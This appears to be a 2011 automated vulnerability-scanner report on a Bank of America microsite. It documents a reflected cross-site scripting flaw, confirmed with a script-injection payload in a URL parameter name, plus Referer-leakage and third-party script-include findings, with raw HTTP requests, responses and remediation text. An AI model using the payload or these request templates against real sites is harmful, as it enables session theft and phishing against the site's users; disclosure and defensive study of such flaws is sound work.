XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, ahead.bankofamerica.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue Aug 23 06:06:08 GMT-06:00 2011.


Loading

1. Cross-site scripting (reflected)

XSS in ahead.bankofamerica.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

2. Cross-domain Referer leakage

2.1. http://ahead.bankofamerica.com/

2.2. http://ahead.bankofamerica.com/supporting-communities/

3. Cross-domain script include

3.1. http://ahead.bankofamerica.com/

3.2. http://ahead.bankofamerica.com/inside-our-company/bank-of-america-reports-second-quarter-2011-financial-results/

3.3. http://ahead.bankofamerica.com/supporting-communities/

3.4. http://ahead.bankofamerica.com/supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /supporting-communities/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30c7e"><script>alert(1)</script>88c43bb9020 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30c7e\"><script>alert(1)</script>88c43bb9020 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /supporting-communities/?30c7e"><script>alert(1)</script>88c43bb9020=1 HTTP/1.1
Host: ahead.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/index.cfm?page=about
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1721016747.281.0000; CM_RegCustID=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; cmTPSet=Y; TCID=0007b0f9-3835-a45a-89dc-870500000014; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; ngen_throttle=1836; hp_beta=B; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=Online+Channel+CTS+Survey+26%2C1%2C1; state=IL; TLTSID=467E2F2ACD3410CD453899B973F58D24; TLTUID=467E2F2ACD3410CD453899B973F58D24; throttle_value=63; NSC_CbolPgBnfsjdb=445b321c7852

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:08:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 44213
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<a href="http://ahead.bankofamerica.com/supporting-communities/?30c7e\"><script>alert(1)</script>88c43bb9020=1">
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://ahead.bankofamerica.com/  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?s=xss HTTP/1.1
Host: ahead.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://ahead.bankofamerica.com/supporting-communities/?30c7escriptalertdocument_location/script88c43bb9020=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1721016747.281.0000; CM_RegCustID=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; cmTPSet=Y; TCID=0007b0f9-3835-a45a-89dc-870500000014; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; ngen_throttle=1836; hp_beta=B; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=Online+Channel+CTS+Survey+26%2C1%2C1; CMAVID=70051313543214176105553; TLTSID=467E2F2ACD3410CD453899B973F58D24; TLTUID=467E2F2ACD3410CD453899B973F58D24; state=IL; throttle_value=63; __utma=33276270.1234652234.1314068779.1314068779.1314068779.1; __utmb=33276270.2.10.1314068779; __utmc=33276270; __utmz=33276270.1314068779.1.1.utmcsr=bankofamerica.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm; NSC_CbolPgBnfsjdb=445b321c7852; cmRS=&t1=1314069061549&t2=1314069066838&t3=-1&fti=1314069392185&fn=EntMktCorpRepSupportingCommunities_UNDEFINED%3A0%3B&ac=0:S&fd=0%3A0%3Asearchsubmit%3B0%3A1%3As%3B&uer=&fu=http%3A//ahead.bankofamerica.com/&pi=Ent%3AMkt%3ACorpRep%3BSupportingCommunities&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//ahead.bankofamerica.com/supporting-communities/%3F30c7escriptalertdocument_location/script88c43bb9020%3D1&rf=http%3A//burp/show/11

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:16:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 27424
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1359940;type=enter782;cat=baccs381;ord=1;num=1?" width="1" height="1" class="auraltext" frameborder="0"></iframe>
...[SNIP]...
<div id="twitter">
           <a target='_blank' href="http://www.twitter.com/bofa_news" onclick="makeCreatePageElementTag('Ent:Mkt:CorpRep;twitter follow','Ent:Mkt:CorpRep','','AheadLP');"
               class="LVTTAG">
Follow us on Twitter to get the latest news on Bank of America <span class="auraltext">
...[SNIP]...
<li><a href="http://www.ml.com/" class="interstitial"
               onclick='makeCreatePageElementTag("Merill",pageID,pageID);'>
Merrill Lynch Home <span class="auraltext">
...[SNIP]...
<li><a href="http://www.ustrust.com/ust/pages/index.aspx" class="LVTTAG" target="_blank"
               onclick='makeCreatePageElementTag("US Trust",pageID,pageID);'>
U.S. Trust Home <span class="auraltext">
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

2.2. http://ahead.bankofamerica.com/supporting-communities/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /supporting-communities/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /supporting-communities/?30c7escriptalertdocument_location/script88c43bb9020=1 HTTP/1.1
Host: ahead.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://ahead.bankofamerica.com/supporting-communities/?30c7escriptalertdocument_location/script88c43bb9020=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1721016747.281.0000; CM_RegCustID=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; cmTPSet=Y; TCID=0007b0f9-3835-a45a-89dc-870500000014; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; ngen_throttle=1836; hp_beta=B; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=Online+Channel+CTS+Survey+26%2C1%2C1; CMAVID=70051313543214176105553; __utma=33276270.1234652234.1314068779.1314068779.1314068779.1; __utmb=33276270.1.10.1314068779; __utmc=33276270; __utmz=33276270.1314068779.1.1.utmcsr=bankofamerica.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm; TLTSID=467E2F2ACD3410CD453899B973F58D24; TLTUID=467E2F2ACD3410CD453899B973F58D24; state=IL; throttle_value=63; NSC_CbolPgBnfsjdb=445b321c7852

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:10:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 44248
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1359940;type=enter782;cat=baccs381;ord=1;num=1?" width="1" height="1" class="auraltext" frameborder="0"></iframe>
...[SNIP]...
</script>

<img src="http://amch.questionmarket.com/adsc/d908257/21/912463/adscout.php?ord=1314069" height="1" width="1" border="0">
<!-- category.php -->
...[SNIP]...
<div id="twitter">
           <a target='_blank' href="http://www.twitter.com/bofa_news" onclick="makeCreatePageElementTag('Ent:Mkt:CorpRep;twitter follow','Ent:Mkt:CorpRep','','AheadLP');"
               class="LVTTAG">
Follow us on Twitter to get the latest news on Bank of America <span class="auraltext">
...[SNIP]...
<li><a href="http://www.ml.com/" class="interstitial"
               onclick='makeCreatePageElementTag("Merill",pageID,pageID);'>
Merrill Lynch Home <span class="auraltext">
...[SNIP]...
<li><a href="http://www.ustrust.com/ust/pages/index.aspx" class="LVTTAG" target="_blank"
               onclick='makeCreatePageElementTag("US Trust",pageID,pageID);'>
U.S. Trust Home <span class="auraltext">
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

3. Cross-domain script include  previous
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://ahead.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?s=xss HTTP/1.1
Host: ahead.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://ahead.bankofamerica.com/supporting-communities/?30c7escriptalertdocument_location/script88c43bb9020=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1721016747.281.0000; CM_RegCustID=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; cmTPSet=Y; TCID=0007b0f9-3835-a45a-89dc-870500000014; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; ngen_throttle=1836; hp_beta=B; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=Online+Channel+CTS+Survey+26%2C1%2C1; CMAVID=70051313543214176105553; TLTSID=467E2F2ACD3410CD453899B973F58D24; TLTUID=467E2F2ACD3410CD453899B973F58D24; state=IL; throttle_value=63; __utma=33276270.1234652234.1314068779.1314068779.1314068779.1; __utmb=33276270.2.10.1314068779; __utmc=33276270; __utmz=33276270.1314068779.1.1.utmcsr=bankofamerica.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm; NSC_CbolPgBnfsjdb=445b321c7852; cmRS=&t1=1314069061549&t2=1314069066838&t3=-1&fti=1314069392185&fn=EntMktCorpRepSupportingCommunities_UNDEFINED%3A0%3B&ac=0:S&fd=0%3A0%3Asearchsubmit%3B0%3A1%3As%3B&uer=&fu=http%3A//ahead.bankofamerica.com/&pi=Ent%3AMkt%3ACorpRep%3BSupportingCommunities&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394&ul=http%3A//ahead.bankofamerica.com/supporting-communities/%3F30c7escriptalertdocument_location/script88c43bb9020%3D1&rf=http%3A//burp/show/11

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:16:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 27424
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

3.2. http://ahead.bankofamerica.com/inside-our-company/bank-of-america-reports-second-quarter-2011-financial-results/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /inside-our-company/bank-of-america-reports-second-quarter-2011-financial-results/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /inside-our-company/bank-of-america-reports-second-quarter-2011-financial-results/ HTTP/1.1
Host: ahead.bankofamerica.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ahead.bankofamerica.com/supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/
X-Moz: prefetch
Cookie: CMAVID=none; throttle_value=28; cmTPSet=Y; TCID=0007b0f9-3d09-e658-9ee5-87050000005a; NSC_CbolPgBnfsjdb=445b321c7852; __utma=33276270.1614892973.1314069086.1314069086.1314069086.1; __utmb=33276270.2.10.1314069086; __utmc=33276270; __utmz=33276270.1314069086.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:12:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Link: <http://ahead.bankofamerica.com/?p=11443>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 72971
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/912550/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

3.3. http://ahead.bankofamerica.com/supporting-communities/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /supporting-communities/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /supporting-communities/ HTTP/1.1
Host: ahead.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/index.cfm?page=about
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WAOR=1721016747.281.0000; CM_RegCustID=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; cmTPSet=Y; TCID=0007b0f9-3835-a45a-89dc-870500000014; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; ngen_throttle=1836; hp_beta=B; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110823:0:O:ba1cacba-ea94-4490-8db893b0533636c1; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=Online+Channel+CTS+Survey+26%2C1%2C1; state=IL; TLTSID=467E2F2ACD3410CD453899B973F58D24; TLTUID=467E2F2ACD3410CD453899B973F58D24; throttle_value=63; NSC_CbolPgBnfsjdb=445b321c7852

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:07:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 43978
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel="stylesheet" href="http://ahead.bankofamerica.com/wp-content/themes/influencers4/css/global.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_control tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/20/911762/randm.js"></script>
...[SNIP]...
<!-- dynamic logic microsite_exposed tag -->
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d908257/21/911763/randm.js"></script>
...[SNIP]...

3.4. http://ahead.bankofamerica.com/supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ahead.bankofamerica.com
Path:   /supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/ HTTP/1.1
Host: ahead.bankofamerica.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ahead.bankofamerica.com/supporting-communities/?30c7e%22%3E%3Cscript%3Ealert(1)%3C/script%3E88c43bb9020=1
Cookie: CMAVID=none; throttle_value=28; cmTPSet=Y; TCID=0007b0f9-3d09-e658-9ee5-87050000005a; NSC_CbolPgBnfsjdb=445b321c7852; __utma=33276270.1614892973.1314069086.1314069086.1314069086.1; __utmb=33276270.1.10.1314069086; __utmc=33276270; __utmz=33276270.1314069086.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmRS=&t1=1314069143466&t2=-1&t3=1314069144597&t4=1314069130092&lti=1314069144597&ln=&hr=http%3A//ahead.bankofamerica.com/supporting-communities/bank-of-america-charitable-foundation-announces-50-million-three-year-pledge-to-education-as-a-path-to-workforce-success/&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394&ul=http%3A//ahead.bankofamerica.com/supporting-communities/%3F30c7e%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E88c43bb9020%3D1&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue

Response

HTTP/1.1 200 OK
Date: Tue, 23 Aug 2011 03:12:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
X-Pingback: http://ahead.bankofamerica.com/xmlrpc.php
